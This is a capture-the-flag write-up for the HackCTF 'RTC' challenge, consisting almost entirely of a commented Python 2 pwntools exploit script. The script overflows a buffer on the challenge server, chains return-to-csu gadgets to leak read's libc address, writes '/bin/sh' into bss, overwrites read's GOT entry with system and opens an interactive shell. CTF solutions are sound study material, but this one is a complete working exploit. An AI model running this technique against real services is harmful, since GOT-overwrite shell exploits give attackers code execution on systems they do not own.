


HackCTF - RTC

ii4gsp 2020. 5. 5. 23:05

 

 

 

 

from pwn import *

# Challenge endpoint and binaries exactly as given in the write-up.
r = remote('ctf.j0n9hyun.xyz', 3025)
e = ELF('./rtc')
libc = ELF('./libc.so.6')  # libc shipped with the challenge; all symbol offsets below come from it

binsh = '/bin/sh\x00'      # 8 bytes including the NUL; len(binsh) is reused as a read() size below
bss = e.bss()              # writable scratch address inside ./rtc; binsh is read into it later

# Two gadget addresses inside ./rtc. Given the challenge name (RTC) these are
# presumably a return-to-csu style pair (stage0 pops the frame, stage1 makes
# the call) -- not verifiable from this listing alone; confirm against the
# binary's disassembly.
stage0 = 0x00000000004006ba
stage1 = 0x00000000004006a0

def exploit(addr, arg1, arg2, arg3):
    # Build one 56-byte frame (seven little-endian qwords) in the slot order
    # 0, 1, addr, arg3, arg2, arg1, stage1. The frame carries no logic of its
    # own: which register each slot ends up in, and what the leading 0/1 pair
    # controls, is decided by the stage0/stage1 gadgets (presumably a loop
    # counter/bound so that exactly one call through `addr` is made -- TODO
    # confirm against the disassembly). stage1 is the address returned to
    # after the frame has been consumed.
    #
    # NOTE: this is Python 2 pwntools code -- p64() returns str there, so
    # '' + p64(...) works. Under Python 3 p64() returns bytes and the
    # concatenation raises TypeError.
    payload = ''
    payload += p64(0)
    payload += p64(1)
    payload += p64(addr)
    payload += p64(arg3)
    payload += p64(arg2)
    payload += p64(arg1)
    payload += p64(stage1)

    return payload

# First message: filler up to the saved return address (0x48 bytes, taken from
# the write-up), then stage0, then four exploit() frames. Each frame is
# separated by one 8-byte padding word -- presumably swallowed by an extra
# stack adjustment inside the gadget pair (TODO confirm).
# With exploit(addr, arg1, arg2, arg3) read as "call *addr with
# (arg1, arg2, arg3)", the four frames are, in order:
#   1. write(1, &GOT[read], 8)       -> leaks read's resolved libc address to stdout
#   2. read(0, bss, len(binsh))      -> stores the 8-byte '/bin/sh\x00' string at bss
#   3. read(0, &GOT[read], 8)        -> overwrites read's GOT slot with the next 8 bytes sent
#   4. call *GOT[read] with (bss, 0, 0) -> after frame 3 this is whatever address was written
payload = ''
payload += '\x90' * 0x48
payload += p64(stage0)
payload += exploit(e.got['write'], 1, e.got['read'], 8)
payload += '\x90' * 8
payload += exploit(e.got['read'], 0, bss, len(binsh))
payload += '\x90' * 8
payload += exploit(e.got['read'], 0, e.got['read'], 8)
payload += '\x90' * 8
payload += exploit(e.got['read'], bss, 0, 0)

# The service prints one line before reading input; sendline appends '\n'.
r.recvuntil('\n')
r.sendline(payload)

# Frame 1 delivers exactly 8 bytes: read's address in the remote libc.
# Subtracting the offset from the shipped libc.so.6 gives the libc base,
# from which system's address is derived.
libc_base = u64(r.recv(8)) - libc.symbols['read']
system = libc_base + libc.symbols['system']

# Second message satisfies frames 2 and 3 back to back: the first 8 bytes land
# at bss (the '/bin/sh' string), the next 8 replace read's GOT entry with
# system. Frame 4 then calls it with rdi presumably pointing at bss.
# sendline's trailing '\n' is left unread in the stream.
payload = ''
payload += binsh
payload += p64(system)

r.sendline(payload)

r.interactive()
